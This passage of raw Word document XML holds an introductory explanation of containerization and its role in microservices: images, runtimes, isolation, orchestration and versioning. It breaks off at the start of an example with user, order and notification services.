          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves packaging an application along with all its dependencies (libraries, configuration files, etc.) into a container. Containers run on a container runtime (like Docker), which provides a consistent environment for the application to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E3887" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Components</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B7833" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A read-only template that includes the application code, runtime, libraries, and dependencies. It is used to create containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BEF83F" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A running instance of a container image. It is an isolated environment where the application runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604659CF" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container Runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Software that manages the lifecycle of containers. Docker is the most popular container runtime, but alternatives include containerd and CRI-O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F03AA3" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0629EC" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Containers run in isolated environments, which means they do not interfere with each other and have their own filesystem, process space, and network interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383311B" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Containers can run on any system that has a compatible container runtime, making them portable across different environments (development, testing, production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFA1B7" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Containers ensure that applications run the same way regardless of where they are deployed, reducing “it works on my machine” issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBB934" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Containerization Relates to Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2CE3EB" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microservices architecture involves breaking down a monolithic application into smaller, independent services that communicate with each other. Containerization complements this approach in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E309B04" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Isolation and Independence</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7D0FA" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each microservice can be packaged into its own container, ensuring that each service operates in its own isolated environment. This isolation simplifies development, testing, and deployment, as each service can be managed independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8EF92" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B8B54" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containers make it easy to scale individual microservices independently. For instance, if a specific service experiences high demand, you can spin up additional containers for that service without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CD06CF" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AFF40" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Since containers package all dependencies, microservices can be deployed consistently across different environments (development, staging, production). This portability ensures that microservices behave the same way regardless of where they are run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F221A" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deployment and Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C0FD8" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container orchestration tools like Kubernetes, Docker Swarm, and Apache Mesos manage the deployment, scaling, and operation of containers. They provide features like automated scaling, load balancing, and service discovery, which are essential for managing complex microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B78A77C" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistency in Development</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE2DF8" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Containers provide a consistent environment for development and testing. Developers can work on their local machines using containers that mirror the production environment, which reduces compatibility issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6487B" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Versioning and Rollbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234751CE" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container images can be versioned, making it easy to deploy specific versions of a microservice. Rollbacks to previous versions can be done quickly if issues arise with a new deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A0B61" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Containerization in a Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C333CEA" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Suppose you have an application with the following microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4AB17" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Manages user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72143FCF" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handles orders and transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0D9B8" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Notification Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Sends notifications to users.</w:t>
      </w:r>
    </w:p>
